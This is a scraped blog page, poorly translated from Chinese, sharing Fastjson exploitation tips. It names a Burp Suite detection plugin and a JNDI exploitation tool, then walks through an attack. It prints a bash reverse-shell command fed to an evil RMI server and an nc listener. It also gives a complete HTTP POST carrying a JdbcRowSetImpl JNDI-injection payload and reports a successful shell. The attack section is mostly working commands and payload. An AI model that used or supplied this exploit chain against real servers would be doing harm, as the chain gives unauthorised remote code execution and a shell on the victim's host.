当前位置:网站首页>Fastjson vulnerability utilization techniques
Fastjson vulnerability utilization techniques
2022-06-24 16:08:00 【Bypass】
Every time I see json Data packets , Will inevitably think of Fastjson And vulnerabilities in multiple versions of it .
How to realize automatic detection and simplify attack steps , So as to improve the ability of vulnerability discovery , Make you more efficient Tips, Let's share with you .
01、 Automated vulnerability detection
Based on a BurpSuite Passive FastJson Test plug-in , This plug-in will help BurpSuite Coming in with json The request packet of data is detected .
Github Project address :
https://github.com/pmiaowu/BurpFastJsonScan
02、 Simplify attack steps
Here we can use a JNDI Service utilization tools , To simplify the fastjson Steps of vulnerability detection , Assist in vulnerability exploitation and penetration .
Github Project address :
https://github.com/wyzxxz/jndi_toolFstjson Exploit :
(1) Turn on RMI service
java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "bash -i >&/dev/tcp/xxxx.xxx.xxx.xxx/12345 0>&1"
(2) Set listening server
nc -lvvp 12345
(3) Construct request send payload
POST /login HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 111
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://xxx.xxx.xxx.xxx:1099/Object","autoCommit":true}
(4) Target system received POST request , Successful rebound shell.
边栏推荐
- Nifi from introduction to practice (nanny level tutorial) - environment
- One article explains Jackson configuration information in detail
- Some experiences of project K several operations in the global template
- 山金期货安全么?期货开户都是哪些流程?期货手续费怎么降低?
- Mongodb Getting started Practical Tutoriel: Learning Summary Table des matières
- Software test [high frequency] interview questions sorted out by staying up late (latest in 2022)
- HMM to CRF understanding and learning notes
- 2021-04-25: given an array arr and a positive number m, the
- Still worried about missing measurements? Let's use Jacobo to calculate the code coverage
- 不忘初心
猜你喜欢

Database tools in intelij can connect but cannot display schema, tables

存在安全隐患 部分冒险家混动版将召回

【面试高频题】难度 3/5,可直接构造的序列 DP 题

Mongodb Getting started Practical Tutoriel: Learning Summary Table des matières
![[my advanced OpenGL learning journey] learning notes of OpenGL coordinate system](/img/21/48802245fea2921fd5e4a9a2d9ad18.jpg)
[my advanced OpenGL learning journey] learning notes of OpenGL coordinate system

构建Go命令行程序工具链

Solution to the problem that FreeRTOS does not execute new tasks

MongoDB入門實戰教程:學習總結目錄

Wechat official account debugging and natapp environment building

How to easily realize online karaoke room and sing "mountain sea" with Wang Xinling
随机推荐
安装ImageMagick7.1库以及php的Imagick扩展
MongoDB入门实战教程:学习总结目录
2021-05-04: given a non negative integer C, you need to judge whether there are two integers a and B, so that a*a+b*b=c.
中国产品经理的没落:从怀恋乔布斯开始谈起
HMM to CRF understanding and learning notes
Install the imagemagick7.1 library and the imageick extension for PHP
2021-04-22: given many line segments, each line segment has two numbers [start, end],
【云原生 | Kubernetes篇】Kubernetes基础入门(三)
Ascinema with asciicast2gif for efficient command line terminal recording
CAP:多重注意力机制,有趣的细粒度分类方案 | AAAI 2021
期货怎么开户安全些?哪些期货公司靠谱些?
Global and Chinese market of music synthesizer 2022-2028: Research Report on technology, participants, trends, market size and share
存在安全隐患 路虎召回部分混动揽运
PyTorch中的转置卷积详解
Pytorch 转置卷积
Nature刊登量子计算重大进展:有史以来第一个量子集成电路实现
如何轻松实现在线K歌房,与王心凌合唱《山海》
[application recommendation] the hands-on experience and model selection suggestions of apifox & apipost in the recent fire
Remote connection raspberry pie in VNC Viewer Mode
The penetration of 5g users of operators is far slower than that of 4G. The popularity of 5g still depends on China Radio and television